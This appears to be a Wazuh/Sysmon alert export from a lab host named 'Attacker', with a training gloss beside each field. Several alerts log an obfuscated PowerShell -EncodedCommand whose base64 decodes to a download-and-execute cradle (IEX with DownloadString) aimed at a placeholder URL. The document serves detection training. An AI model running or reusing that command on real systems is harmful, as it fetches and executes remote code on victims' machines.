data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 128 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535373.2792287 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:11.2971818Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350642 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:11.257
ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00}
ProcessId: 2932
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pvs24fpt.wtt.ps1
CreationUtcTime: 2025-04-24 22:56:11.257
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:11.257 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c189-680a-f00c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pvs24fpt.wtt.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:11.257 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 125 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535376.2795052 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:13.9948115Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350673 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:12.688
ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00}
ProcessId: 1724
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c189-680a-f00c-000000000e00}
ParentProcessId: 2932
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:12.688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18c-680a-f20c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1724 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 129 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535376.2803115 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:14.2252877Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350674 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:14.198
ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00}
ProcessId: 1724
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_xdqtovfm.esx.ps1
CreationUtcTime: 2025-04-24 22:56:14.198
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:14.198 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18c-680a-f20c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1724 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xdqtovfm.esx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:14.198 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 126 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535381.2805880 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:18.4933409Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350713 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:15.702
ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00}
ProcessId: 8928
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00}
ParentProcessId: 1724
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:15.702 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c18f-680a-f40c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1724 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 130 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535381.2813943 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:18.7447989Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350714 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:18.693
ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00}
ProcessId: 8928
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cew1hm2c.hha.ps1
CreationUtcTime: 2025-04-24 22:56:18.689
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:18.693 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
